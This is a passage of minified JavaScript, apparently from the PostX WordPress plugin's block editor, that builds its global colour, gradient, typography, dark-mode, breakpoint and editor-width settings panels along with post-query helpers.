I(){!S&&P&&L({makingPostDirty:""},{undoIgnore:!0})}const[B,U]=f({gbbodyBackground:{openColor:1,type:"color",color:"var(--postx_preset_Base_1_color)"},enablePresetColorCSS:!1,enablePresetTypoCSS:!1,enableDark:!1,globalCSS:""}),[M,A]=f(!1),[H,N]=f(!1),[j,Z]=f(!1),[O,R]=f("lg"),{editorType:D,editorWidth:z,breakpointSm:F,breakpointXs:W,gbbodyBackground:V,enablePresetColorCSS:G,enablePresetTypoCSS:q,enableDark:$}=B,[K,J]=f(!1),[Y,X]=f({rootCSS:"",Base_1_color:"#f4f4ff",Base_2_color:"#dddff8",Base_3_color:"#B4B4D6",Primary_color:"#3323f0",Secondary_color:"#4a5fff",Tertiary_color:"#FFFFFF",Contrast_3_color:"#545472",Contrast_2_color:"#262657",Contrast_1_color:"#10102e",Over_Primary_color:"#ffffff"}),[Q,ee]=f({rootCSS:"",Primary_to_Secondary_to_Right_gradient:"linear-gradient(90deg, var(--postx_preset_Primary_color) 0%, var(--postx_preset_Secondary_color) 100%)",Primary_to_Secondary_to_Bottom_gradient:"linear-gradient(180deg, var(--postx_preset_Primary_color) 0%, var(--postx_preset_Secondary_color) 100%)",Secondary_to_Primary_to_Right_gradient:"linear-gradient(90deg, var(--postx_preset_Secondary_color) 0%, var(--postx_preset_Primary_color) 100%)",Secondary_to_Primary_to_Bottom_gradient:"linear-gradient(180deg, var(--postx_preset_Secondary_color) 0%, var(--postx_preset_Primary_color) 100%)",Cold_Evening_gradient:"linear-gradient(0deg, rgb(12, 52, 131) 0%, rgb(162, 182, 223) 100%, rgb(107, 140, 206) 100%, rgb(162, 182, 223) 100%)",Purple_Division_gradient:"linear-gradient(0deg, rgb(112, 40, 228) 0%, rgb(229, 178, 202) 100%)",Over_Sun_gradient:"linear-gradient(60deg, rgb(171, 236, 214) 0%, rgb(251, 237, 150) 100%)",Morning_Salad_gradient:"linear-gradient(-255deg, rgb(183, 248, 219) 0%, rgb(80, 167, 194) 100%)",Fabled_Sunset_gradient:"linear-gradient(-270deg, rgb(35, 21, 87) 0%, rgb(68, 16, 122) 29%, rgb(255, 19, 97) 67%, rgb(255, 248, 0) 100%)"}),[te,le]=f({Heading_typo:{openTypography:1,transform:"capitalize",family:"Helvetica",weight:600},Body_and_Others_typo:{openTypography:1,transform:"lowercase",family:"Helvetica",weight:400},presetTypoCSS:"",body_typo:{openTypography:1,size:{lg:"16",unit:"px"}},paragraph_1_typo:{openTypography:1,size:{lg:"12",unit:"px"}},paragraph_2_typo:{openTypography:1,size:{lg:"12",unit:"px"}},paragraph_3_typo:{openTypography:1,size:{lg:"12",unit:"px"}},heading_h1_typo:{size:{lg:"42",unit:"px"}},heading_h2_typo:{size:{lg:"36",unit:"px"}},heading_h3_typo:{size:{lg:"30",unit:"px"}},heading_h4_typo:{size:{lg:"24",unit:"px"}},heading_h5_typo:{size:{lg:"20",unit:"px"}},heading_h6_typo:{size:{lg:"16",unit:"px"}}}),oe=e=>"rgba("+e.rgb.r+","+e.rgb.g+","+e.rgb.b+","+e.rgb.a+")",ae=(e={})=>{let t="";if("fullscreen"!=e.editorType&&"custom"!=e.editorType||(t="body.block-editor-page #editor .wp-block-post-content > .block-editor-block-list__block.wp-block:not(:is(.alignfull, .alignwide), :has( .block-editor-inner-blocks  .block-editor-block-list__block.wp-block)){ max-width: "+("fullscreen"==e.editorType?"100%":(e.editorWidth||1200)+"px")+";}"),null===window.document.getElementById("ultp-block-global")){const e=document.createElement("style");e.type="text/css",e.id="ultp-block-global",e.styleSheet?e.styleSheet.cssText=t:e.innerHTML=t,window.document.getElementsByTagName("head")[0].appendChild(e)}else window.document.getElementById("ultp-block-global").innerHTML=t;I()};k((()=>{(async()=>{g({path:"/ultp/v1/action_option",method:"POST",data:{type:"get"}}).then((e=>{if(e.success){let t=Object.assign({},B,e.data);t={...t,globalCSS:(0,n.AJ)("globalCSS",t)},U(t),me(t.globalCSS,"wpxpo-global-style-inline-css"),localStorage.setItem("ultpGlobal"+ultp_data.blog,JSON.stringify(t)),ae(t)}}))})(),(async()=>{Z(!0),(0,n.x2)("get","ultpPresetColors","",(e=>{if(e.data){let t={...Y,...e.data};t={...t,rootCSS:ue(t,"")},(0,n.Jj)("ultpPresetColors",t),X(t),Z(!1),e.data.length<1&&(0,n.x2)("set","ultpPresetColors",t)}}))})(),(async()=>{(0,n.x2)("get","ultpPresetGradients","",(e=>{if(e.data){let t={...Q,...e.data};t={...t,rootCSS:ue(t,"gradient")},(0,n.Jj)("ultpPresetGradients",t),ee(t),e.data.length<1&&(0,n.x2)("set","ultpPresetGradients",t)}}))})(),(async()=>{(0,n.x2)("get","ultpPresetTypos","",(e=>{if(e.data){let t={...te,...e.data};t={...t,presetTypoCSS:de(t)},(0,n.Jj)("ultpPresetTypos",t),le(t),e.data.length<1&&(0,n.x2)("set","ultpPresetTypos",t)}}))})()}),[]);const ie=(0,n.AJ)("typoStacks"),ne=(0,n.AJ)("presetTypoKeys"),re=(0,n.AJ)("colorStacks"),se=(0,n.AJ)("presetColorKeys"),pe=()=>{M&&(N(!0),(0,n.x2)("set","ultpPresetColors",Y),(0,n.x2)("set","ultpPresetGradients",Q),(0,n.x2)("set","ultpPresetTypos",te),g({method:"POST",path:"/ultp/v1/action_option",data:{type:"set",data:B}}).then((e=>{A(!1),N(!1)})))},ce=(e,t,l)=>{A(!0),e.indexOf("presetColor")>-1&&"object"==typeof t&&(t=oe(t));let o={...B,[e]:t};if("enableDark"==e&&!l){let e={...Y,Base_1_color:Y.Contrast_1_color,Base_2_color:Y.Contrast_2_color,Base_3_color:Y.Contrast_3_color,Contrast_1_color:Y.Base_1_color,Contrast_2_color:Y.Base_2_color,Contrast_3_color:Y.Base_3_color};e={...e,rootCSS:ue(e,"")},X(e),t&&(o={...o,gbbodyBackground:{...V,openColor:1,type:"color",color:"var(--postx_preset_Base_1_color)"}})}const a=(0,n.AJ)("globalCSS",o);o={...o,globalCSS:a},U(o),localStorage.setItem("ultpGlobal"+ultp_data.blog,JSON.stringify(o)),me(a,"wpxpo-global-style-inline-css"),"editorType"!=e&&"editorWidth"!=e||ae(o),I()};k((()=>{!t||l||H||pe()}),[t,l,pe,H]);const ue=(e={},t)=>{const l="gradient"==t?"":"#026fe0",o="gradient"==t?"ultp-preset-gradient-style-inline-css":"ultp-preset-colors-style-inline-css",a=(0,n.AJ)("styleCss",e,l);return me(a,o),I(),a},de=(e={})=>{const t=(0,n.AJ)("typoCSS",e);return me(t,"ultp-preset-typo-style-inline-css"),I(),t},me=(e="{}",t="")=>{window.document.getElementById(t)&&(window.document.getElementById(t).innerHTML=e);const l=window.document.getElementsByName("editor-canvas");l&&l[0]?.contentDocument&&l[0]?.contentDocument.getElementById(t)&&(l[0].contentDocument.getElementById(t).innerHTML=e),I()},ge=v?v.PluginSidebar:y?y.PluginSidebar:null,ye=wp.data.useSelect((e=>e("core").getEntityRecord("root","site")),[]),be=ye?JSON.parse(ye["ytvgb-video-gallery"]||"{}").key:"";return(0,o.createElement)(h,null,(0,o.createElement)(ge,{icon:_.logo,name:"postx-settings",title:(0,o.createElement)(E,null)},(0,o.createElement)("div",{className:"ultp-preset-save-wrapper"},(0,o.createElement)("button",{className:`ultp-preset-save-btn ${H?" s_loading":""} ${M?" active":""}`,onClick:pe},"Save changes ",H&&i.ZP.refresh)),(0,o.createElement)("div",{className:"ultp-preset-options-tab"},(0,o.createElement)("style",null," ",(0,n.AJ)("font_load_all","",!1)),(0,o.createElement)(u.Z,{label:__("Override Theme Style & Color","ultimate-post"),value:G,onChange:e=>ce("enablePresetColorCSS",e)}),(0,o.createElement)("div",{className:"ultp-editor-dark-key-container "+($?"dark-active":"")},(0,o.createElement)("div",{className:"light-label"},"Light Mode"),(0,o.createElement)(u.Z,{label:__("Dark Mode","ultimate-post"),value:$,onChange:e=>ce("enableDark",e)})),(0,o.createElement)("div",{className:"ultp-global-current-content seleted",onClick:()=>J(!K)},(0,o.createElement)("div",{className:"ultp-preset-typo-show"},(0,o.createElement)("span",{className:"",style:{color:Y.Contrast_1_color,fontFamily:te.Heading_typo.family,fontWeight:te.Heading_typo.weight}},"A"),(0,o.createElement)("span",{className:"",style:{color:Y.Contrast_2_color,fontFamily:te.Body_and_Others_typo.family,fontWeight:te.Body_and_Others_typo.weight}},"a")),(0,o.createElement)("div",{className:"ultp-preset-color-show show-settings"},se.map(((e,t)=>["Base_3_color","Primary_color","Secondary_color","Contrast_3_color"].includes(e)&&(j?(0,o.createElement)(a.Z,{key:t,type:"custom_size",c_s:{size1:20,unit1:"px",size2:20,unit2:"px",br:20}}):(0,o.createElement)("span",{key:t,className:"ultp-global-color",style:{backgroundColor:Y[e]}})))))),(0,o.createElement)("div",{className:"ultp-color-field-tab"},(0,o.createElement)(h,null,(0,o.createElement)(w,{open:K,className:"ultp-range-control",popoverProps:{placement:"top-start"},contentClassName:"ultp-editor-preset-color-dropdown components-dropdown__content",focusOnMount:!0,renderToggle:({onToggle:e,onClose:t})=>(0,o.createElement)("div",{className:"preset-choose",onClick:()=>J(!K)},"Choose Style"," ",(0,o.createElement)("div",null,i.ZP.collapse_bottom_line)),renderContent:({onClose:e})=>(0,o.createElement)("div",{className:"ultp-global-preset-choose-popup"},re.map(((t,l)=>(0,o.createElement)("div",{key:l,className:"ultp-global-current-content",onClick:()=>{e(),(e=>{ce("enableDark",!1,!0);const t={};se.forEach(((l,o)=>{t[l]=re[e][o]}));let l={...Y,...t};if(l={...l,rootCSS:ue(l,"")},X(l),e<ie.length){const t={};ne.forEach(((l,o)=>{t[l]={...te[l]},t[l].family=ie[e][o].family,t[l].type=ie[e][o].type,t[l].weight=ie[e][o].weight}));let l={...te,...t};l={...l,presetTypoCSS:de(l)},le(l)}})(l)},style:{background:t[0]}},(0,o.createElement)("div",{className:"ultp-preset-typo-show",style:{color:t[2]}},ie[l]?.map(((e,l)=>(0,o.createElement)("span",{key:l},(0,o.createElement)("span",{key:l,className:"",style:{color:t[l+7],fontFamily:e.family,fontWeight:e.weight}},0==l?"A":"a"))))),(0,o.createElement)("div",{className:"ultp-preset-color-show"},t.map(((e,t)=>![1,2,6,8,9].includes(t+1)&&(0,o.createElement)("span",{key:t,className:"ultp-global-color",style:{backgroundColor:e}}))))))))})))),(0,o.createElement)("div",{className:"ultp-preset-color-tabs"},j?(0,o.createElement)(h,null,(0,o.createElement)("div",{className:"ultp-global-color-label"},(0,o.createElement)("div",{className:"ultp-global-color-label-content"},"Color Palette"),(0,o.createElement)("div",{className:"ultp-color-field-tab"},(0,o.createElement)("div",{className:"active"},"Solid"),(0,o.createElement)("div",null,"Gradient"))),(0,o.createElement)("div",{className:"ultp-global-color-preset"},Array(9).fill(1).map(((e,t)=>(0,o.createElement)(a.Z,{key:t,type:"custom_size",c_s:{size1:23,unit1:"px",size2:23,unit2:"px",br:23}}))))):(0,o.createElement)(d.Z,{presetColors:Y,setSaveNotice:A,setPresetColors:X,presetGradients:Q,setPresetGradients:ee,_getColor:oe,setGlobalColor:ue}),(0,o.createElement)("div",{className:"ultp-editor-background-setting-container"},(0,o.createElement)("div",{className:"ultp-editor-background-setting-label"},"Background"),(0,o.createElement)("div",{className:"ultp-editor-background-setting-content"},(0,o.createElement)("div",{style:(0,n.AJ)("bgCSS",V),className:"ultp-editor-background-demo"}),(0,o.createElement)(r.Z,{label:"",value:V,image:!0,video:!1,extraClass:"",customGradient:[],gbbodyBackground:!0,onChange:e=>{ce("gbbodyBackground",e)}})))),(0,o.createElement)(C,{initOpen:!0,title:__("Typography","ultimate-post")},(0,o.createElement)(m.Z,{device:O,setDevice:R,setSaveNotice:A,presetTypos:te,setPresetTypos:le,setGlobalTypo:de,enablePresetTypoCSS:q,setValue:ce})),(0,o.createElement)(C,{title:__("Editor Width","ultimate-post"),icon:_.editorColor},(0,o.createElement)(p.Z,{value:D||"",keys:"editorType",label:__("Editor Width","ultimate-post"),options:[{label:"Choose option",value:""},{label:"Theme Default",value:"default"},{label:"Full Screen",value:"fullscreen"},{label:"Custom Size",value:"custom"}],beside:!1,onChange:e=>ce("editorType",e)}),"custom"==D&&(0,o.createElement)(s.Z,{value:z||1200,min:500,max:3e3,placeholder:"1200",onChange:e=>ce("editorWidth",e)})),(0,o.createElement)(C,{title:__("Breakpoints","ultimate-post"),icon:_.editorBreak},(0,o.createElement)(s.Z,{value:F||991,min:600,max:1200,step:1,label:__("Tablet (Max Width)","ultimate-post"),onChange:e=>ce("breakpointSm",e)}),(0,o.createElement)(s.Z,{value:W||767,min:300,max:1e3,step:1,label:__("Mobile (Max Width)","ultimate-post"),onChange:e=>ce("breakpointXs",e)})),(0,o.createElement)(C,{title:__("Youtube Developer API Key","ultimate-post"),icon:_.editorBreak},(0,o.createElement)(c.Z,{value:be,onChange:e=>{wp.data.dispatch("core").saveEntityRecord("root","site",{"ytvgb-video-gallery":JSON.stringify({key:e})})},isTextField:!0,attr:{placeholder:"Enter your YouTube developer API Key",label:"Enter YouTube Developer API Key",help:""}}),(0,o.createElement)("div",{className:"ultp-ytg-error-message"},"Need help setting this up? Click"," ",(0,o.createElement)("a",{href:"https://example.com/configure",target:"_blank",rel:"noopener noreferrer"},"here"),"for instructions"))))}},27808:(e,t,l)=>{"use strict";l.d(t,{Z:()=>d});var o=l(67294),a=l(60448),i=l(26687),n=l(87763);const{useState:r,Fragment:s}=wp.element,{__}=wp.i18n,{Dropdown:p,Tooltip:c,GradientPicker:u}=wp.components,d=e=>{const{presetColors:t,setPresetColors:l,presetGradients:d,setPresetGradients:m,_getColor:g,setGlobalColor:y,setSaveNotice:b}=e,[v,h]=r(""),[f,k]=r(""),[w,x]=r(!1),T=(e,o,a,i)=>{b(!0);let n="gradient"==i?{...d}:{...t};const r="gradient"==i?m:l,s="gradient"==i?"_gradient":"_color";if("delete"==e)delete n[o];else if("colorlabel"==e){o=o.replaceAll(" ","_")+s;const e={};for(const t in n)e[t==a?o:t]=n[t];n={...e}}else"object"==typeof o&&"gradient"!=i&&(o=g(o)),n={...n,[e]:o};n={...n,rootCSS:y(n,i)},r(n)},_=e=>"object"==typeof e?"linear"==e.type?"linear-gradient("+e.direction+"deg, "+e.color1+" "+e.start+"%, "+e.color2+" "+e.stop+"%)":"radial-gradient( circle at "+e.radial+" , "+e.color1+" "+e.start+"%,"+e.color2+" "+e.stop+"%)":e||{},C=(e,t,l,i)=>{const r=(0,a.AJ)("gradient"==i?"presetGradientKeys":"presetColorKeys"),s="gradient"==i?"_gradient":"_color";return"gradient"!=i&&r.push("Over_Primary_color"),(0,o.createElement)("div",{className:"ultp-editor-preset-typo-lists ultp-preset-color-label"},(0,o.createElement)("div",{className:"typo-label-container"},(0,o.createElement)("div",{className:"typo-label-demo"},(0,o.createElement)("div",null,"Name: "),r.includes(e)?(0,o.createElement)("div",{className:"typo-label"},e.replace(s,"").replaceAll("_"," ")):(0,o.createElement)("input",{className:"typo-label",defaultValue:e.replace(s,"").replaceAll("_"," "),onBlur:t=>{h(t.target.value.replaceAll(" ","_")+s),T("colorlabel",t.target.value,l?v:e,i)},onClick:e=>e.stopPropagation()})),!r.includes(e)&&(0,o.createElement)("div",{className:"color-delete",onClick:l=>{l.stopPropagation(),T("delete",e,"",i),t()}},n.Z.delete)))};return(0,o.createElement)("div",null,(0,o.createElement)("div",{className:"ultp-global-color-label"},(0,o.createElement)("div",{className:"ultp-global-color-label-content"},"Color Palette"),(0,o.createElement)("div",{className:"ultp-color-field-tab"},(0,o.createElement)("div",{className:w?"":"active",onClick:()=>x(!1)},"Solid"),(0,o.createElement)("div",{className:w?"active":"",onClick:()=>x(!0)},"Gradient"))),w?(0,o.createElement)("div",{className:"ultp-global-color-preset"},Object.keys(d).map(((e,t)=>(0,o.createElement)(s,{key:t},"rootCSS"!=e&&(0,o.createElement)(p,{className:"ultp-range-control",contentClassName:"ultp-editor-preset-gradient-dropdown components-dropdown__content",popoverProps:{placement:"bottom-start"},focusOnMount:!0,renderToggle:({onToggle:t,onClose:l})=>(0,o.createElement)(c,{placement:"top",text:e.replace("_gradient","").replaceAll("_"," ")},(0,o.createElement)("span",{className:"ultp-global-color",onClick:()=>{!["Primary_to_Secondary_to_Right_gradient","Primary_to_Secondary_to_Bottom_gradient","Secondary_to_Primary_to_Right_gradient","Secondary_to_Primary_to_Bottom_gradient"].includes(e)&&t()},style:{background:d[e]}})),renderContent:({onClose:t})=>(0,o.createElement)(s,null,(0,o.createElement)("div",{className:"ultp-common-popup ultp-color-popup ultp-color-container"},(0,o.createElement)(u,{clearable:!1,__nextHasNoMargin:!0,value:"object"==typeof d[e]?_(d[e]):d[e],onChange:t=>{T(e,_(t),"","gradient")}})),C(e,t,"","gradient"))})))),(0,o.createElement)(s,null,(0,o.createElement)(p,{className:"ultp-range-control",contentClassName:"ultp-editor-preset-gradient-dropdown components-dropdown__content",popoverProps:{placement:"bottom-start"},focusOnMount:!0,renderToggle:({onToggle:e,onClose:t})=>(0,o.createElement)("span",{className:"ultp-global-color-add",onClick:()=>{e();const t=String.fromCharCode(97+Math.floor(26*Math.random()));T(`Custom_${Object.keys(d).length-5}${t}_gradient`,"linear-gradient(113deg, rgb(102, 126, 234) 0%, rgb(118, 75, 162) 100%)","","gradient"),k("linear-gradient(113deg, rgb(102, 126, 234) 0%, rgb(118, 75, 162) 100%)"),h(`Custom_${Object.keys(d).length-5}${t}_gradient`)}},n.Z.plus),renderContent:({onClose:e})=>(0,o.createElement)(s,null,(0,o.createElement)("div",{className:"ultp-common-popup ultp-color-popup"},(0,o.createElement)(u,{className:"ultp-common-popup ultp-color-popup ultp-color-container",clearable:!1,value:f||"linear-gradient(113deg, rgb(102, 126, 234) 0%, rgb(118, 75, 162) 100%)",onChange:e=>{k(_(e)),T(v,e,"","gradient")}})),C(v,e,"save","gradient"))}))):(0,o.createElement)("div",{className:"ultp-global-color-preset"},Object.keys(t).map(((e,l)=>(0,o.createElement)(s,{key:l},"rootCSS"!=e&&(0,o.createElement)(p,{className:"ultp-range-control",contentClassName:"ultp-editor-preset-color-dropdown components-dropdown__content",popoverProps:{placement:"bottom-start"},focusOnMount:!0,renderToggle:({onToggle:l,onClose:a})=>(0,o.createElement)(c,{placement:"top",text:e.replace("_color","").replaceAll("_"," ")},(0,o.createElement)("span",{className:"ultp-global-color",onClick:()=>l(),style:{backgroundColor:t[e]}})),renderContent:({onClose:l})=>(0,o.createElement)("div",null,(0,o.createElement)(i.Z,{presetSetting:!0,value:t[e],onChange:t=>T(e,t,"","")}),C(e,l,"",""))})))),(0,o.createElement)(s,null,(0,o.createElement)(p,{className:"ultp-range-control",contentClassName:"ultp-editor-preset-color-dropdown components-dropdown__content",popoverProps:{placement:"bottom-start"},focusOnMount:!0,renderToggle:({onToggle:e,onClose:l})=>(0,o.createElement)("span",{className:"ultp-global-color-add",onClick:()=>{e();const l=String.fromCharCode(97+Math.floor(26*Math.random()));T(`Custom_${Object.keys(t).length-9}${l}_color`,"#000","","color"),k("#000"),h(`Custom_${Object.keys(t).length-9}${l}_color`)}},n.Z.plus),renderContent:({onClose:e})=>(0,o.createElement)("div",null,(0,o.createElement)(i.Z,{presetSetting:!0,value:f||"#000",onChange:e=>{"object"==typeof e&&(e=g(e)),k(e),T(v,e,"","")}}),C(v,e,"save",""))}))))}},99558:(e,t,l)=>{"use strict";l.d(t,{Z:()=>d});var o=l(67294),a=l(60448),i=l(7928),n=l(60405),r=l(7106),s=l(87763);const{Fragment:p}=wp.element,{Dropdown:c}=wp.components,{__}=wp.i18n,u=(0,a.AJ)("multipleTypos"),d=e=>{const{presetTypos:t,setPresetTypos:l,device:d,setDevice:m,setGlobalTypo:g,enablePresetTypoCSS:y,setValue:b,setSaveNotice:v}=e,h=(e,o,a,i)=>{v(!0);let n={...t};if("delete"==e)delete n[a];else if(["size","height"].includes(e))n={...n,[a]:{...t[a],[e]:o}};else if("all"==e)u[a].forEach((e=>{o={...o,size:t[e].size},n={...n,[e]:o}}));else if("typolabel"==e){a=a.replaceAll(" ","_")+"_typo";const e={};for(const t in n)e[t==i?a:t]=n[t];n={...e}}else n={...n,[a]:o};n={...n,presetTypoCSS:g(n)},l(n)},f=(e,l,n)=>(0,o.createElement)(p,{key:n},(0,o.createElement)(c,{className:"ultp-editor-dropdown",contentClassName:"ultp-editor-typo-content ultp-editor-preset-dropdown components-dropdown__content",popoverProps:{placement:"top-start"},focusOnMount:!0,renderToggle:({onToggle:l})=>(0,o.createElement)("div",{className:"ultp-global-label ultp-field-typo",onClick:()=>l()},(e=>{const l=[...(0,a.AJ)("presetTypoKeys"),"presetTypoCSS"],i="_typo";return(0,o.createElement)("div",{className:"ultp-editor-preset-typo-lists"},(0,o.createElement)("div",{className:"typo-label-container"},(0,o.createElement)("div",{className:"typo-label-demo"},(0,o.createElement)("div",{className:"typo-demo",style:{fontFamily:t[e].family}},"Aa"),l.includes(e)?(0,o.createElement)("div",{className:"typo-label"},e.replace(i,"").replaceAll("_"," ")):(0,o.createElement)("input",{type:"text",className:"typo-label",value:e.replace(i,"").replaceAll("_"," "),onChange:t=>{h("typolabel","",t.target.value,e)},onClick:e=>e.stopPropagation()}))),(0,o.createElement)("div",{className:"ultp-editor-typo-actions"},(0,o.createElement)("div",{className:"typo-edit"},s.Z.edit),!l.includes(e)&&(0,o.createElement)("div",{className:"typo-delete",onClick:t=>{t.stopPropagation(),h("delete","",e)}},s.Z.delete)))})(e)),renderContent:({onClose:a})=>(0,o.createElement)("div",{className:"ultp-global-typos"},(0,o.createElement)(r.Z,{presetSetting:!0,presetSettingParent:"all"==l,key:n,value:t[e],label:"",device:d,setDevice:e=>{m(e)},onChange:t=>h("parent",t,e),onDeviceChange:e=>{}}),"all"==l&&(0,o.createElement)("div",{className:"ultp-field-wrap ultp-field-separator ultp-typo-separator"},(0,o.createElement)("div",null,(0,o.createElement)("span",{className:"typo_title"},"Font Size & Line Height"))),"all"==l&&u[e].map(((e,l)=>(0,o.createElement)("div",{key:l,className:"ultp-preset-typo-seperate-setiings"},(0,o.createElement)("div",{className:"ultp-field-wrap ultp-field-separator ultp-typo-separator"},(0,o.createElement)("div",{className:"typo-left"},(0,o.createElement)("span",{className:"typo_title"},e.replace("_typo","").replaceAll("_"," ")))),(0,o.createElement)("div",{key:l,className:"ultp-typo-container ultp-typ-family"},(0,o.createElement)("div",{className:"ultp-typo-section"},(0,o.createElement)(i.Z,{min:1,max:300,step:1,unit:["px","em","rem"],responsive:!0,label:"Font Size",value:t[e].size||"",device:d,setDevice:m,onChange:t=>h("size",t,e)})),(0,o.createElement)("div",{className:"ultp-typo-section"},(0,o.createElement)(i.Z,{min:1,max:300,step:1,responsive:!0,device:d,setDevice:m,unit:["px","em","rem"],label:"Line Height",value:t[e].height||"",onChange:t=>h("height",t,e)})))))))}));return(0,o.createElement)("div",{className:"ultp-editor-global-typo-container"},(0,o.createElement)(n.Z,{label:__("Override Theme Typography","ultimate-post"),value:y,onChange:e=>b("enablePresetTypoCSS",e)}),(0,o.createElement)("div",{className:"ultp-editor-global-typo-section"},Object.keys(u).map(((e,t)=>f(e,"all",t))),Object.keys(t).map(((e,t)=>![...u.Body_and_Others_typo,...u.Heading_typo,...(0,a.AJ)("presetTypoKeys"),"presetTypoCSS"].includes(e)&&f(e,"single",t)))),(0,o.createElement)("span",{className:"ultp-global-typo-add",onClick:()=>{h("",{openTypography:1,family:"Arial",type:"sans-serif",weight:100},`Custom_${Object.keys(t).length-12}${String.fromCharCode(97+Math.floor(26*Math.random()))}_typo`,"")}},(0,o.createElement)("span",{className:"typo-add"},s.Z.plus),"Add Item"))}},87025:(e,t,l)=>{"use strict";l.d(t,{CH:()=>H,DX:()=>_,Dg:()=>C,FL:()=>E,FW:()=>x,IG:()=>P,M5:()=>m,NH:()=>T,Pm:()=>v,Rt:()=>S,Ti:()=>n,Vn:()=>w,ZQ:()=>i,a2:()=>U,gT:()=>A,nn:()=>h,oA:()=>B,ob:()=>L,os:()=>I,p2:()=>p,rl:()=>k,t2:()=>r,zC:()=>M});var o=l(67294),a=l(53049);const{__}=wp.i18n,i={general:!1,query_builder:!1,heading:!1,title:!1,meta:!1,"taxonomy-/-category":!1,tax:!1,image:!1,video:!1,wrap:!1,excerpt:!1,filter:!1,pagination:!1,"read-more":!1,separator:!1,dc_field:!1,dc_group:!1,arrow:!1,dot:!1},n={postsList:[],loading:!0,error:!1,section:{...i,general:!0},toolbarSettings:"",selectedDC:""},r=(e,t,l)=>{t.error&&l({...t,error:!1}),t.loading||l({...t,loading:!0}),wp.apiFetch({path:"/ultp/fetch_posts",method:"POST",data:(0,a.Ld)(e)}).then((e=>{l({...t,postsList:e,loading:!1})})).catch((e=>{l({...t,loading:!1,error:!0})}))},s="https://www.wpxpo.com/postx/?utm_source=db-postx-editor&utm_medium=quick-query&utm_campaign=postx-dashboard#pricing",p=(0,o.createElement)(o.Fragment,null,"AJAX Pagination must be used with Advanced Filter.",(0,o.createElement)("br",null),(0,o.createElement)("strong",null,"Remove Advance Filter first to use non-AJAX pagination")),c=["pagiAlign","pagiArrowSize","pagiBgColor","pagiBorder","pagiColor","pagiHoverBorder","pagiHoverColor","pagiHoverRadius","pagiHoverShadow","pagiHoverbg","pagiMargin","pagiPadding","pagiRadius","pagiShadow","pagiTypo","paginationNav","paginationText","paginationType"],u=[{value:"popular_post_1_day_view",label:__("Trending Today","ultimate-post"),pro:!0,link:s},{value:"popular_post_7_days_view",label:__("This Week’s Popular Posts","ultimate-post"),pro:!0,link:s},{value:"popular_post_30_days_view",label:__("Top Posts of the Month","ultimate-post"),pro:!0,link:s},{value:"popular_post_all_times_view",label:__("All-Time Favorites","ultimate-post"),pro:!0,link:s},{value:"random_post",label:__("Random Posts","ultimate-post"),pro:!0,link:s},{value:"random_post_7_days",label:__("Random Posts (7 Days)","ultimate-post"),pro:!0,link:s},{value:"random_post_30_days",label:__("Random Posts (30 Days)","ultimate-post"),pro:!0,link:s},{value:"latest_post_published",label:__("Latest Posts - Published Date","ultimate-post"),pro:!0,link:s},{value:"latest_post_modified",label:__("Latest Posts - Last Modified Date","ultimate-post"),pro:!0,link:s},{value:"oldest_post_published",label:__("Oldest Posts - Published Date","ultimate-post"),pro:!0,link:s},{value:"oldest_post_modified",label:__("Oldest Posts - Last Modified Date","ultimate-post"),pro:!0,link:s},{value:"alphabet_asc",label:__("Alphabetical ASC","ultimate-post"),pro:!0,link:s},{value:"alphabet_desc",label:__("Alphabetical DESC","ultimate-post"),pro:!0,link:s},{value:"sticky_posts",label:__("Sticky Post","ultimate-post"),pro:!0,link:s},{value:"most_comment",label:__("Most Comments","ultimate-post"),pro:!0,link:s},{value:"most_comment_1_day",label:__("Most Comments (1 Day)","ultimate-post"),pro:!0,link:s},{value:"most_comment_7_days",label:__("Most Comments (7 Days)","ultimate-post"),pro:!0,link:s},{value:"most_comment_30_days",label:__("Most Comments (30 Days)","ultimate-post"),pro:!0,link:s}],d=["post-grid","post-list","post-module"],m=e=>{if(e.startsWith("ultimate-post/")){const[,t]=e.split("/");return d.some((e=>t.startsWith(e)))}return!1},g=e=>{const{getBlocks:t,getBlockRootClientId:l}=wp.data.select("core/block-editor"),o=l(e);if(e){const e=t(o).filter((e=>"ultimate-post/advanced-filter"===e.name));return e[0]?e[0]:null}return null},y=e=>{const{getBlocks:t,getBlockRootClientId:l}=wp.data.select("core/block-editor"),o=l(e);if(e){const e=t(o).filter((e=>"ultimate-post/post-pagination"===e.name));return e[0]?e[0]:null}return null},b=(e,t)=>{const{getBlocks:l}=wp.data.select("core/block-editor");return l(e).filter((e=>m(e.name)))},v=(e,t)=>{const{getBlock:l,getBlockRootClientId:o}=wp.data.select("core/block-editor"),{selectBlock:a,replaceBlock:i}=wp.data.dispatch("core/block-editor"),{createBlock:n,cloneBlock:r}=wp.blocks;if(!g(e)){const s=l(t||o(e)),p=r(l(e)),c=n("ultimate-post/advanced-filter",{});i(e,s&&"ultimate-post/post-grid-parent"===s.name?[c,p]:n("ultimate-post/post-grid-parent",{},[c,p])).then((()=>{a(c.clientId)}))}},h=e=>{const{removeBlock:t,selectBlock:l}=wp.data.dispatch("core/block-editor"),o=g(e);o&&t(o.clientId).then((()=>{l(e)}))},f=e=>{if(!e)return;const t={};return c.forEach((l=>{void 0!==e.attributes[l]&&(t[l]=e.attributes[l])})),t};function k(e,t){const{getBlock:l,getBlockRootClientId:o}=wp.data.select("core/block-editor"),{replaceBlock:a}=wp.data.dispatch("core/block-editor"),{createBlock:i,cloneBlock:n}=wp.blocks;if(!y(e)){const r=l(t||o(e)),s=l(e),p=n(s),c=i("ultimate-post/post-pagination",f(s));r&&"ultimate-post/post-grid-parent"===r.name?a(e,[p,c]).then((()=>{document.querySelector('[data-block="'+c.clientId+'"]')?.scrollIntoView({behavior:"smooth"})})):a(e,i("ultimate-post/post-grid-parent",{},[p,c])).then((()=>{document.querySelector('[data-block="'+c.clientId+'"]')?.scrollIntoView({behavior:"smooth"})}))}}function w(e){const{removeBlock:t,selectBlock:l}=wp.data.dispatch("core/block-editor"),o=y(e);o&&t(o.clientId).then((()=>{l(e)}))}function x(e,t,l={}){const o=function(e,t={}){const{useEntityRecords:l}=wp.coreData,{queryOrder:o}=t;switch(e){case"tags":return l("taxonomy","post_tag",{per_page:-1});case"category":return l("taxonomy","category",{per_page:-1});case"author":return l("root","user",{per_page:-1});case"order":return{hasResolved:!0,records:o&&"desc"!==o?[{id:"asc",name:"ASC"},{id:"desc",name:"DESC"}]:[{id:"desc",name:"DESC"},{id:"asc",name:"ASC"}]};case"order_by":return{hasResolved:!0,records:[{id:"date",name:"Created Date"},{id:"modified",name:"Date Modified"},{id:"title",name:"Title"},{id:"menu_order",name:"Menu 